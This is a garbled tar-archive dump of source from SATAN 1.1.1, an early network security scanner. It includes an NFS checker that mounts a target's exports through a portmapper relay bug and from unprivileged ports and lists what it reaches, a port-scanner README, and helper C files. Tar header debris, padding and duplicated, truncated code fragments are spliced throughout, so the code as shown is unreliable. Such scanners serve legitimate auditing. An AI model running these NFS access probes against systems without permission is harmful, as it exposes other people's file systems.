mount_xdr.c PROG.= $(BIN)/nfs-chk CFLAGS.= -O -I. $(XFLAGS) XFLAGS.= -DAUTH_GID_T=int RPCGEN.= rpcgen #LIBS.= -lsocket -lnsl $(PROG):$(OBJECTS) .$(CC) $(CFLAGS) -o $@ $(OBJECTS) $(LIBS) nfs_prot.h nfs_prot_clnt.c nfs_prot_xdr.c: nfs_prot.x .$(RPCGEN) $? 2>/dev/null nfs_prot.x: .cp /usr/include/rpcsvc/nfs_prot.x . mount.h mount_clnt.c mount_xdr.c: mount.x .$(RPCGEN) $? 2>/dev/null mount.x: .cp /usr/include/rpcsvc/mount.x . clean: .rm -f $(PROG) *.o core $(MAKES) nfs-chk.o: mount.h nfs_prot.h * Set up the pipe that interposes the command into our standard input * stream. */ if (pipe(pipefds)) .perror_exit("pipe"); switch (pid = fork()) { case -1:...../* error */ .perror_exit("fork"); ./* NOTREACHED */ case 0:...../* child */ .(void) close(pipefds[0]);../* close readisatan-1.1.1/src/nfs-chk/mount.x..................................................................... 400 . 465 . 506 . 10725 5664357621 11405. ........................................................... ................................................................................................................................................................................................................................................................. ......................................../* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ /* * Protocol description for the mount program */ #ifndef RPC_HDR %#ifndef lint %/*static char sccsid[] = "from: @(#)mount.x 1.2 87/09/18 Copyr 1987 Sun Micro";*/ %/*static char sccsid[] = "from: @(#)mount.x.2.1 88/08/01 4.0 RPCSRC";*/ %static char rcsid[] = "$Id: mount.x,v 1.1 1994/08/04 19:01:46 wollman Exp $"; %#endif /* not lint */ #endif const MNTPATHLEN = 1024;./* maximum bytes in a pathname argument */ const MNTNAMLEN = 255;../* maximum bytes in a name argument */ const FHSIZE = 32;../* size in bytes of a file handle */ /* * The fhandle is the file handle that the server passes to the client. * All file operations are done using the file handles to refer to a file * or a directory. The file handle can contain whatever information the * server needs to distinguish an individual file. */ typedef opaque fhandle[FHSIZE];. /* * If a status of zero is returned, the call completed successfully, and * a file handle for the directory follows. A non-zero status indicates * some sort of error. The status corresponds with UNIX error numbers. */ union fhstatus switch (unsigned fhs_status) { case 0: .fhandle fhs_fhandle; default: .void; }; /* * The type dirpath is the pathname of a directory */ typedef string dirpath<MNTPATHLEN>; /* * The type name is used for arbitrary names (hostnames, groupnames) */ typedef string name<MNTNAMLEN>; /* * A list of who has what mounted */ typedef struct mountbody *mountlist; struct mountbody { .name ml_hostname; .dirpath ml_directory; .mountlist ml_next; }; /* * A list of netgroups */ typedef struct groupnode *groups; struct groupnode { .name gr_name; .groups gr_next; }; /* * A list of what is exported and to whom */ typedef struct exportnode *exports; struct exportnode { .dirpath ex_dir; .groups ex_groups; .exports ex_next; }; program MOUNTPROG { ./* . * Version one of the mount protocol communicates with version two . * of the NFS protocol. The only connecting point is the fhandle . * structure, which is the same for both protocols. . */ .version MOUNTVERS { ../* .. * Does no work. It is made available in all RPC services .. * to allow server reponse testing and timing .. */ ..void ..MOUNTPROC_NULL(void) = 0; ../*. .. * If fhs_status is 0, then fhs_fhandle contains the . . * file handle for the directory. This file handle may .. * be used in the NFS protocol. This procedure also adds .. * a new entry to the mount list for this client mounting .. * the directory. .. * Unix authentication required. .. */ ..fhstatus ..MOUNTPROC_MNT(dirpath) = 1; ../* .. * Returns the list of remotely mounted filesystems. The .. * mountlist contains one entry for each hostname and .. * directory pair. .. */ ..mountlist ..MOUNTPROC_DUMP(void) = 2; ../* .. * Removes the mount list entry for the directory .. * Unix authentication required. .. */ ..void ..MOUNTPROC_UMNT(dirpath) = 3; ../* .. * Removes all of the mount list entries for this client .. * Unix authentication required. .. */ ..void ..MOUNTPROC_UMNTALL(void) = 4; ../* .. * Returns a list of all the exported filesystems, and which .. * machines are allowed to import it. .. */ ..exports ..MOUNTPROC_EXPORT(void) = 5; ../* .. * Identical to MOUNTPROC_EXPORT above .. */ ..exports ..MOUNTPROC_EXPORTALL(void) = 6; .} = 1; } = 100005; THE * WARRANTIES OF DESIGN, MERCHANTIBILITsatan-1.1.1/src/nfs-chk/nfs-chk.c................................................................... 600 . 465 . 506 . 24244 5740245145 11542. .............................................................. ................................................................................................................................................................................................................................................................. ..................................... /* * nfs-chk - report on nfs file accessibility * * Tries to mount via the portmapper. * * Tries to mount as unprivileged user. * * Needs to be run by superuser. * * Author: Wietse Venema. */ #define PORTMAP #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #include <netdb.h> #include <netinet/in.h> #include <arpa/inet.h> #include <rpc/rpc.h> #include <rpc/pmap_prot.h> #ifdef TIRPC #include <sys/tiuser.h> #include <stropts.h> #endif #ifndef INADDR_NONE #define INADDR_NONE (-1)../* XXX should be 0xffffffff */ #endif extern int getopt(); extern int optind; extern char *optarg; #include "mount.h" #include "nfs_prot.h" static struct timeval timeout = {5, 0}; static int verbose = 0; static int portmap = 1; static char *progname; #define debug if (verbose) printf #define UNPRIVILEGED_PORT.0 #define PRIVILEGED_PORT..1 struct hostinfo { char *hostname; struct sockaddr_in sin; CLIENT *mountd_clnt;../* privileged mount */ CLIENT *nfsd_clnt;.../* privileged nfs */ CLIENT *umountd_clnt;../* unprivileged mount */ CLIENT *unfsd_clnt;.../* privileged nfs */ }; /* usage - explain and terminate */ void usage() { fprintf(stderr, "Usage: %s [-p] [-v] [-t timeout] hostname\n", progname); exit(1); } /* perrorexit - print error and exit */ void perrorexit(text) char *text; { perror(text); exit(1); } /* clnt_pcreateerrorexit - print error and exit */ void clnt_pcreateerrorexit(text) char *text; { clnt_pcreateerror(text); exit(1); } /* clnt_perrorexit - print error and exit */ void clnt_perrorexit(client, text) CLIENT *client; char *text; { clnt_perror(client, text); exit(1); } /* nfs_perror - print nfs error */ void nfs_perror(status, text) int status; char *text; { errno = status;..../* XXX */ perror(text); } /* nfs_perrorexit - print nfs error and exit */ void nfs_perrorexit(status, text) int status; char *text; { errno = status;..../* XXX */ perrorexit(text); } /* reserved_port - allocate a privileged port or bust */ int reserved_port(type, protocol) int type; int protocol; { struct sockaddr_in sin; int port; int sock; if ((sock = socket(AF_INET, type, protocol)) < 0) .perrorexit("nfs-chk: socket"); memset((char *) &sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = 0; for (port = IPPORT_RESERVED - 1; port > IPPORT_RESERVED / 2; port--) { .sin.sin_port = htons((u_short) port); .if (bind(sock, (struct sockaddr *) & sin, sizeof(sin)) >= 0) { . debug("Using privileged port %d\n", port); . return (sock); .} .if (errno != EADDRINUSE && errno != EADDRNOTAVAIL) . break; } perrorexit("nfs-chk: bind privileged port"); } /* make_client - create client handle to talk to rpc server */ CLIENT *make_client(addr, program, version, privileged) struct sockaddr_in *addr; u_long program; u_long version; int privileged; { CLIENT *client; int sock; AUTH_GID_T nul = 0; #if 0 debug("Trying to set up TCP client handle\n"); addr->sin_port = 0; if (privileged) { .sock = reserved_port(SOCK_STREAM, IPPROTO_TCP); } else { .sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); } if (sock < 0) .perrorexit("nfs-chk: socket"); #ifdef TIRPC ioctl(sock, I_PUSH, "timod"); #endif if (client = clnttcp_create(addr, program, version, &sock, 0, 0)) { .connect(sock, (struct sockaddr *) addr, sizeof(*addr)); .client->cl_auth = authunix_create("", 0, 0, 1, &nul); .return (client); } close(sock); #endif debug("Trying to set up UDP client handle\n"); addr->sin_port = 0; if (privileged) { .sock = reserved_port(SOCK_DGRAM, IPPROTO_UDP); } else { .sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); } if (sock < 0) .perrorexit("nfs-chk: socket"); #ifdef TIRPC ioctl(sock, I_PUSH, "timod"); #endif if (client = clntudp_create(addr, program, version, timeout, &sock)) { .client->cl_auth = authunix_create("", 0, 0, 1, &nul); .return (client); } close(sock); return (0); } /* portmap_mount - mount via portmapper */ fhstatus *portmap_mount(path, addr) char *path; struct sockaddr_in *addr; { static fhstatus mount_status; u_long port; memset((char *) &mount_status, 0, sizeof(mount_status)); addr->sin_port = htons(PMAPPORT); if (pmap_rmtcall(addr, MOUNTPROG, MOUNTVERS, MOUNTPROC_MNT, .. xdr_dirpath, &path, .. xdr_fhstatus, &mount_status, .. timeout, &port) == 0) { .return (&mount_status); } return (0); } /* print_attributes - display file modes */ void print_attributes(ap, path) fattr *ap; char *path; { char *cp; time_t seconds; switch (ap->type) { case NFREG: .putchar('-'); .break; case NFDIR: .putchar('d'); .break; default: .putchar('?'); .break; } putchar((ap->mode & 0400) ? 'r' : '-'); putchar((ap->mode & 0200) ? 'w' : '-'); putchar((ap->mode & 0100) ? . ((ap->mode & 04000) ? 's' : 'x') : . ((ap->mode & 04000) ? 'S' : '-')); putchar((ap->mode & 040) ? 'r' : '-'); putchar((ap->mode & 020) ? 'w' : '-'); putchar((ap->mode & 010) ? . ((ap->mode & 02000) ? 's' : 'x') : . ((ap->mode & 02000) ? 'S' : '-')); putchar((ap->mode & 04) ? 'r' : '-'); putchar((ap->mode & 02) ? 'w' : '-'); putchar((ap->mode & 01) ? . ((ap->mode & 01000) ? 't' : 'x') : . ((ap->mode & 01000) ? 'T' : '-')); seconds = ap->ctime.seconds; cp = ctime(&seconds); printf("%3d %8d %5d %9d %-7.7s %-4.4s %s\n", . ap->nlink, ap->uid, ap->gid, ap->size, cp + 4, cp + 20, path); } /* show_mount_point - display mount point info */ int show_mount_point(path, mount_status, client) char *path; fhstatus *mount_status; CLIENT *client; { attrstat *attr_status; if ((attr_status = nfsproc_getattr_2(mount_status->fhstatus_u.fhs_fhandle, ..... client)) == 0) { .clnt_perror(client, path); .return (0); } else if (attr_status->status != NFS_OK) { .nfs_perror(attr_status->status, path); .return (0); } else { .print_attributes(&(attr_status->attrstat_u.attributes), path); .return (1); } } /* examine_filesystem - examine exported file system */ void examine_filesystem(h, path, client_info) struct hostinfo *h; char *path; groups client_info; { fhstatus *mount_status; if (client_info == 0) { .printf("Warning: host %s exports %s to the world\n", h->hostname, path); } else { .printf("Examining: %s:%s\n", h->hostname, path); } if (portmap) { .debug("Trying to mount %s via portmapper\n", path); .mount_status = portmap_mount(path, &h->sin); .if (mount_status != 0 && mount_status->fhs_status == NFS_OK) { . if (show_mount_point(path, mount_status, h->nfsd_clnt)) ..printf("Warning: host %s exports %s via portmapper\n", .. h->hostname, path); . debug("Unmounting: %s\n", path); . mountproc_umnt_1(&path, h->mountd_clnt); .} } debug("Trying to mount %s via mountd\n", path); mount_status = mountproc_mnt_1(&path, h->mountd_clnt); if (mount_status != 0 && mount_status->fhs_status == NFS_OK) { .if (show_mount_point(path, mount_status, h->nfsd_clnt)) . printf("Mounted: %s via mount daemon\n", path); .debug("Unmounting: %s\n", path); .mountproc_umnt_1(&path, h->mountd_clnt); .mount_status = mountproc_mnt_1(&path, h->umountd_clnt); .if (mount_status != 0 && mount_status->fhs_status == NFS_OK) { . if (show_mount_point(path, mount_status, h->unfsd_clnt)) ..printf("Warning: host %s exports %s to unprivileged programs\n", .. h->hostname, path); . debug("Unmounting: %s\n", path); . mountproc_umnt_1(&path, h->umountd_clnt); .} } } /* find_host - look up host information */ void find_host(h) struct hostinfo *h; { struct hostent *hp; long addr; /* * Look up IP address information. XXX with multi-homed hosts, should try * all addresses until we succeed. */ memset((char *) &h->sin, 0, sizeof(h->sin)); h->sin.sin_family = AF_INET; if ((addr = inet_addr(h->hostname)) != INADDR_NONE) { .h->sin.sin_addr.s_addr = addr; } else if ((hp = gethostbyname(h->hostname)) == 0) { .fprintf(stderr, "%s: host not found: %s\n", progname, h->hostname); .exit(1); } else { .memcpy((char *) &h->sin.sin_addr, hp->h_addr, sizeof(h->sin)); } /* * Look up mountd and nfsd information. */ debug("Setting up mountd clients\n"); if ((h->mountd_clnt = . make_client(&h->sin, MOUNTPROG, MOUNTVERS, PRIVILEGED_PORT)) == 0) .clnt_pcreateerrorexit("privileged mountd client create"); if ((h->umountd_clnt = . make_client(&h->sin, MOUNTPROG, MOUNTVERS, UNPRIVILEGED_PORT)) == 0) .clnt_pcreateerrorexit("unprivileged mountd client create"); debug("Setting up nfsd clients\n"); if ((h->nfsd_clnt = make_client(&h->sin, NFS_PROGRAM, NFS_VERSION, PRIVILEGED_PORT)) == 0) .clnt_pcreateerrorexit("privileged nfsd client create"); if ((h->unfsd_clnt = make_client(&h->sin, NFS_PROGRAM, NFS_VERSION, UNPRIVILEGED_PORT)) == 0) .clnt_pcreateerrorexit("unprivileged nfsd client create"); } main(argc, argv) int argc; char *argv[]; { exports exp; exports *exp_list; int opt; struct hostinfo h; progname = argv[0]; /* * Parse JCL. */ while ((opt = getopt(argc, argv, "pvt:")) != EOF) { .switch (opt) { .case 'p':..../* don't try portmap bug */ . portmap = 0; . break; .case 'v':..../* turn on verbose mode */ . verbose = 1; . break; .case 't':..../* change timeout */ . timeout.tv_sec = atoi(optarg); . break; .default: . usage(); . /* NOTREACHED */ .} } if (argc != optind + 1) .usage(); h.hostname = argv[optind]; /* * Look up host information. Only the name is stolen from RJN. */ find_host(&h); /* * For each exported file system, report if we can access it. By way of * proof, show an "ls -l" like listing. */ debug("Retrieving exports list\n"); if ((exp_list = mountproc_export_1(NULL, h.mountd_clnt)) == 0) .clnt_perrorexit(h.mountd_clnt, "mount export list"); for (exp = *exp_list; exp; exp = exp->ex_next) { .examine_filesystem(&h, exp->ex_dir, exp->ex_groups); } } } } /* examine_filesystem - examine exported file system */ void examine_filesystem(h, path, client_info) struct hostinfo *h; char *path; groups client_info; { fhstatus *mount_status; if (client_info == 0) { .printf("Warning: host %s exports %s to the world\n", h->hostname, path); } else { .printf("Examining: %s:%s\n", h->hsatan-1.1.1/src/nfs-chk/nfs_prot.x.................................................................. 400 . 465 . 506 . 17274 5664357622 12104. ................................................................... ................................................................................................................................................................................................................................................................. ................................/* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef RPC_HDR %#ifndef lint %/*static char sccsid[] = "from: @(#)nfs_prot.x 1.2 87/10/12 Copyr 1987 Sun Micro";*/ %/*static char sccsid[] = "from: @(#)nfs_prot.x.2.1 88/08/01 4.0 RPCSRC";*/ %static char rcsid[] = "$Id: nfs_prot.x,v 1.1 1994/08/04 19:01:47 wollman Exp $"; %#endif /* not lint */ #endif const NFS_PORT = 2049; const NFS_MAXDATA = 8192; const NFS_MAXPATHLEN = 1024; const NFS_MAXNAMLEN.= 255; const NFS_FHSIZE.= 32; const NFS_COOKIESIZE.= 4; const NFS_FIFO_DEV.= -1;./* size kludge for named pipes */ /* * File types */ const NFSMODE_FMT = 0170000;./* type of file */ const NFSMODE_DIR = 0040000;./* directory */ const NFSMODE_CHR = 0020000;./* character special */ const NFSMODE_BLK = 0060000;./* block special */ const NFSMODE_REG = 0100000;./* regular */ const NFSMODE_LNK = 0120000;./* symbolic link */ const NFSMODE_SOCK = 0140000;./* socket */ const NFSMODE_FIFO = 0010000;./* fifo */ /* * Error status */ enum nfsstat { .NFS_OK= 0,../* no error */ .NFSERR_PERM=1,../* Not owner */ .NFSERR_NOENT=2,../* No such file or directory */ .NFSERR_IO=5,../* I/O error */ .NFSERR_NXIO=6,../* No such device or address */ .NFSERR_ACCES=13,./* Permission denied */ .NFSERR_EXIST=17,./* File exists */ .NFSERR_NODEV=19,./* No such device */ .NFSERR_NOTDIR=20,./* Not a directory*/ .NFSERR_ISDIR=21,./* Is a directory */ .NFSERR_FBIG=27,../* File too large */ .NFSERR_NOSPC=28,./* No space left on device */ .NFSERR_ROFS=30,../* Read-only file system */ .NFSERR_NAMETOOLONG=63,./* File name too long */ .NFSERR_NOTEMPTY=66,./* Directory not empty */ .NFSERR_DQUOT=69,./* Disc quota exceeded */ .NFSERR_STALE=70,./* Stale NFS file handle */ .NFSERR_WFLUSH=99./* write cache flushed */ }; /* * File types */ enum ftype { .NFNON = 0,./* non-file */ .NFREG = 1,./* regular file */ .NFDIR = 2,./* directory */ .NFBLK = 3,./* block special */ .NFCHR = 4,./* character special */ .NFLNK = 5,./* symbolic link */ .NFSOCK = 6,./* unix domain sockets */ .NFBAD = 7,./* unused */ .NFFIFO = 8 ./* named pipe */ }; /* * File access handle */ struct nfs_fh { .opaque data[NFS_FHSIZE]; }; /* * Timeval */ struct nfstime { .unsigned seconds; .unsigned useconds; }; /* * File attributes */ struct fattr { .ftype type;../* file type */ .unsigned mode;../* protection mode bits */ .unsigned nlink;../* # hard links */ .unsigned uid;../* owner user id */ .unsigned gid;../* owner group id */ .unsigned size;../* file size in bytes */ .unsigned blocksize;./* prefered block size */ .unsigned rdev;../* special device # */ .unsigned blocks;./* Kb of disk used by file */ .unsigned fsid;../* device # */ .unsigned fileid;./* inode # */ .nfstime.atime;../* time of last access */ .nfstime.mtime;../* time of last modification */ .nfstime.ctime;../* time of last change */ }; /* * File attributes which can be set */ struct sattr { .unsigned mode;./* protection mode bits */ .unsigned uid;./* owner user id */ .unsigned gid;./* owner group id */ .unsigned size;./* file size in bytes */ .nfstime.atime;./* time of last access */ .nfstime.mtime;./* time of last modification */ }; typedef string filename<NFS_MAXNAMLEN>; typedef string nfspath<NFS_MAXPATHLEN>; /* * Reply status with file attributes */ union attrstat switch (nfsstat status) { case NFS_OK: .fattr attributes; default: .void; }; struct sattrargs { .nfs_fh file; .sattr attributes; }; /* * Arguments for directory operations */ struct diropargs { .nfs_fh.dir;./* directory file handle */ .filename name;../* name (up to NFS_MAXNAMLEN bytes) */ }; struct diropokres { .nfs_fh file; .fattr attributes; }; /* * Results from directory operation */ union diropres switch (nfsstat status) { case NFS_OK: .diropokres diropres; default: .void; }; union readlinkres switch (nfsstat status) { case NFS_OK: .nfspath data; default: .void; }; /* * Arguments to remote read */ struct readargs { .nfs_fh file;../* handle for file */ .unsigned offset;./* byte offset in file */ .unsigned count;../* immediate read count */ .unsigned totalcount;./* total read count (from this offset)*/ }; /* * Status OK portion of remote read reply */ struct readokres { .fattr.attributes;./* attributes, need for pagin*/ .opaque data<NFS_MAXDATA>; }; union readres switch (nfsstat status) { case NFS_OK: .readokres reply; default: .void; }; /* * Arguments to remote write */ struct writeargs { .nfs_fh.file;../* handle for file */ .unsigned beginoffset;./* beginning byte offset in file */ .unsigned offset;./* current byte offset in file */ .unsigned totalcount;./* total write count (to this offset)*/ .opaque data<NFS_MAXDATA>; }; struct createargs { .diropargs where; .sattr attributes; }; struct renameargs { .diropargs from; .diropargs to; }; struct linkargs { .nfs_fh from; .diropargs to; }; struct symlinkargs { .diropargs from; .nfspath to; .sattr attributes; }; typedef opaque nfscookie[NFS_COOKIESIZE]; /* * Arguments to readdir */ struct readdirargs { .nfs_fh dir;../* directory handle */ .nfscookie cookie; .unsigned count;../* number of directory bytes to read */ }; struct entry { .unsigned fileid; .filename name; .nfscookie cookie; .entry *nextentry; }; struct dirlist { .entry *entries; .bool eof; }; union readdirres switch (nfsstat status) { case NFS_OK: .dirlist reply; default: .void; }; struct statfsokres { .unsigned tsize;./* preferred transfer size in bytes */ .unsigned bsize;./* fundamental file system block size */ .unsigned blocks;./* total blocks in file system */ .unsigned bfree;./* free blocks in fs */ .unsigned bavail;./* free blocks avail to non-superuser */ }; union statfsres switch (nfsstat status) { case NFS_OK: .statfsokres reply; default: .void; }; /* * Remote file service routines */ program NFS_PROGRAM { .version NFS_VERSION { ..void ..NFSPROC_NULL(void) = 0; ..attrstat ..NFSPROC_GETATTR(nfs_fh) =.1; ..attrstat ..NFSPROC_SETATTR(sattrargs) = 2; ..void ..NFSPROC_ROOT(void) = 3; ..diropres ..NFSPROC_LOOKUP(diropargs) = 4; ..readlinkres ..NFSPROC_READLINK(nfs_fh) = 5; ..readres ..NFSPROC_READ(readargs) = 6; ..void ..NFSPROC_WRITECACHE(void) = 7; ..attrstat ..NFSPROC_WRITE(writeargs) = 8; ..diropres ..NFSPROC_CREATE(createargs) = 9; ..nfsstat ..NFSPROC_REMOVE(diropargs) = 10; ..nfsstat ..NFSPROC_RENAME(renameargs) = 11; ..nfsstat ..NFSPROC_LINK(linkargs) = 12; ..nfsstat ..NFSPROC_SYMLINK(symlinkargs) = 13; ..diropres ..NFSPROC_MKDIR(createargs) = 14; ..nfsstat ..NFSPROC_RMDIR(diropargs) = 15; ..readdirres ..NFSPROC_READDIR(readdirargs) = 16; ..statfsres ..NFSPROC_STATFS(nfs_fh) = 17; .} = 2; } = 100003; lock size */ .unsigned rdev;../* special device # */ .unsigned blocks;./* Kb of disk used by file */ .unsigned fsid;../* device # */ .unsigned fileid;./* inode # */ .nfstime.atime;../* time of last access */ .nfstime.mtime;../* time of last modification */ .nfstime.ctime;../* time of last change */ }; /* * File attributesatan-1.1.1/src/port_scan/.......................................................................... 700 . 465 . 506 . 0 5742521554 10372. .................................................................................... ................................................................................................................................................................................................................................................................. ...............satan-1.1.1/src/port_scan/README.................................................................... 600 . 465 . 506 . 1706 5740245272 11343. ...................................................................................... ................................................................................................................................................................................................................................................................. .............tcp_scan and udp_scan are tools to scan a host for available network services (for example, to see if your packet filter does its job). You can scan specific services or ranges of ports. In order to speed up the process, the tools probe a bunch of network ports in parallel. The programs work with SunOS 4.1.3, SunOS 5.3 (Solaris 2.3) and probably with anything that looks like 4.3+ BSD or System V.4. There is one catch, though: the programs use raw ICMP sockets, so they need to be run with root privilege. Raw ICMP sockets are used to work around common shortcomings in BSD (75-second timeout on a non-blocking TCP connect() to an unreachable host) and in SYSV (a connected UDP socket does not pass delivery errors back to the application). Warning: these programs will raise lots of alarms on sites that run my tcp wrapper or that do any other kind of network monitoring. Use the programs only with prior permission from the affected sites. .Wietse Venema { case NFS_OK: .nfspath data; default: .void; }; /* * Arsatan-1.1.1/src/port_scan/error.c................................................................... 600 . 465 . 506 . 4357 5740245156 11766. ................................................................................................ ................................................................................................................................................................................................................................................................. ... /* * remark, error, panic - diagnostics handlers * * Feature: %m is expanded to the system errno text. * * Author: Wietse Venema. */ #include <stdio.h> #include <errno.h> #ifdef __STDC__ #include <stdarg.h> #define VARARGS(func,type,arg) func(type arg, ...) #define VASTART(ap,type,name) va_start(ap,name) #define VAEND(ap) va_end(ap) #else #include <varargs.h> #define VARARGS(func,type,arg) func(va_alist) va_dcl #define VASTART(ap,type,name) {type name; va_start(ap); name = va_arg(ap, type) #define VAEND(ap) va_end(ap);} #endif char *progname = "unknown"; extern int errno; extern char *strerror(); extern char *strcpy(); #include "lib.h" /* percentm - replace %m by error message associated with value in err */ char *percentm(buf, str, err) char *buf; char *str; int err; { char *ip = str; char *op = buf; while (*ip) { .switch (*ip) { .case '%': . switch (ip[1]) { . case '\0':..../* don't fall off end */ ..*op++ = *ip++; ..break; . case 'm':..../* replace %m */ ..strcpy(op, strerror(err)); ..op += strlen(op); ..ip += 2; ..break; . default:..../* leave %<any> alone */ ..*op++ = *ip++, *op++ = *ip++; ..break; . } .default: . *op++ = *ip++; .} } *op = 0; return (buf); } /* error - print warning on stderr and terminate */ void VARARGS(error, char *, fmt) { va_list ap; int err = errno; char buf[BUFSIZ]; VASTART(ap, char *, fmt); fprintf(stderr, "%s: ", progname); vfprintf(stderr, percentm(buf, fmt, err), ap); fprintf(stderr, "\n"); VAEND(ap); exit(1); } /* remark - print warning on stderr and continue */ void VARARGS(remark, char *, fmt) { va_list ap; int err = errno; char buf[BUFSIZ]; VASTART(ap, char *, fmt); fprintf(stderr, "%s: ", progname); vfprintf(stderr, percentm(buf, fmt, err), ap); fprintf(stderr, "\n"); VAEND(ap); } /* panic - print warning on stderr and dump core */ void VARARGS(panic, char *, fmt) { va_list ap; int err = errno; char buf[BUFSIZ]; VASTART(ap, char *, fmt); fprintf(stderr, "%s: ", progname); vfprintf(stderr, percentm(buf, fmt, err), ap); fprintf(stderr, "\n"); VAEND(ap); abort(); } h value in err */ char *percentm(buf, str, err) char *buf; char *str; int err; { char *ip = str; char *op = buf; while (*ip) { .switch (*ip) { .case '%': . switch (ip[1]) { . case '\0':..../* don't fall off end */ ..*op++ = *ip++; ..break;satan-1.1.1/src/port_scan/find_addr.c............................................................... 600 . 465 . 506 . 2165 5740245164 12541. ............................................................................................. ................................................................................................................................................................................................................................................................. ...... /* * find_addr, find_port - map internet hosts and services to internal form * * Author: Wietse Venema. */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include "lib.h" /* find_addr - translate numerical or symbolic host name */ struct in_addr find_addr(host) char *host; { struct in_addr addr; struct hostent *hp; addr.s_addr = inet_addr(host); if ((addr.s_addr == -1) || (addr.s_addr == 0)) { .if ((hp = gethostbyname(host)) == 0) . error("%s: host not found", host); .if (hp->h_addrtype != AF_INET) . error("unexpected address family: %d", hp->h_addrtype); .memcpy((char *) &addr, hp->h_addr, hp->h_length); } return (addr); } /* find_port - translate numerical or symbolic service name */ int find_port(service, protocol) char *service; char *protocol; { struct servent *sp; int port; if ((port = atoi(service)) != 0) { .return (htons(port)); } else { .if ((sp = getservbyname(service, protocol)) == 0) . error("%s/%s: unknown service", service, protocol); .return (sp->s_port); } } :..../* leave %<any> alone */ ..*op++ = *ip++, *op++ = *ip++; ..break; . } .default: . *op++ = *ip++; .} } *op = 0; return (buf); } /* error - print warning on stderr and terminate */ void VARARGS(error, char *, fmt) { va_list ap; int err = errno; char buf[BUFSIZ]; VASTART(ap, char *, fmt); fprintf(stderr, "%s: ", progname); vfprintf(stdesatan-1.1.1/src/port_scan/lib.h..................................................................... 600 . 465 . 506 . 1477 5720110066 11375. .................................................................................... ................................................................................................................................................................................................................................................................. ...............#ifdef __STDC__ #define ARGS(x) x #else #define ARGS(x) () #endif /* mallocs.c */ extern char *mymalloc(); extern char *myrealloc(); extern char *dupstr(); /* find_addr.c */ extern struct in_addr find_addr(); extern int find_port(); /* error.c */ extern void remark ARGS((char *,...)); extern void error ARGS((char *,...)); extern void panic ARGS((char *,...)); extern char *progname; /* print_data.c */ extern void print_data(); /* ring.c */ typedef struct RING { struct RING *succ; /* successor */ struct RING *pred; /* predecessor */ } RING; extern void ring_init ARGS((RING *)); extern void ring_prepend ARGS((RING *, RING *)); extern void ring_append ARGS((RING *, RING *)); extern void ring_detach ARGS((RING *)); #define ring_succ(c) ((c)->succ) #define ring_pred(c) ((c)->pred) ,...)); extern void panic ARGS((char *,...)); extern char *progname; /* print_data.c */ extern void print_data(); /* ring.c */ typedef struct RING { struct RING *succ; /* satan-1.1.1/src/port_scan/strerror.c................................................................ 600 . 465 . 506 . 530 5741757374 12477. ........................................................... ................................................................................................................................................................................................................................................................. ........................................ /* * strerror - translate error number to string * * Author: Wietse Venema. */ extern char *sys_errlist[]; extern int sys_nerr; char *strerror(err) int err; { static char buf[20]; if (err < sys_nerr && err > 0) { .return (sys_errlist[err]); } else { .sprintf(buf, "Unknown error %d", err); .return (buf); } } ARGS((char *,...)); extern char *progname; /* print_data.c */ extern void print_data(); /* ring.c */ typedef struct RING { struct RING *succ; /* satan-1.1.1/src/port_scan/mallocs.c................................................................. 600 . 465 . 506 . 1341 5740245171 12252. ........................................................... ................................................................................................................................................................................................................................................................. ........................................ /* * mymalloc, myrealloc, dupstr - memory allocation with error handling * * Environment: POSIX, ANSI * * Author: Wietse Venema. */ #include <stdlib.h> #include <unistd.h> #include <string.h> #include "lib.h" /* mymalloc - allocate memory or bust */ char *mymalloc(len) int len; { char *ptr; if ((ptr = malloc(len)) == 0) .error("Insufficient memory: %m"); return (ptr); } /* myrealloc - reallocate memory or bust */ char *myrealloc(ptr, len) char *ptr; int len; { if ((ptr = realloc(ptr, len)) == 0) .error("Insufficient memory: %m"); return (ptr); } /* dupstr - save string to heap */ char *dupstr(str) char *str; { return (strcpy(mymalloc(strlen(str) + 1), str)); } ddr); } /* find_port - translate numerical or symbolic service name */ int find_port(service, protocol) char *service; char *protocol; { struct servent *sp; int port; if ((port 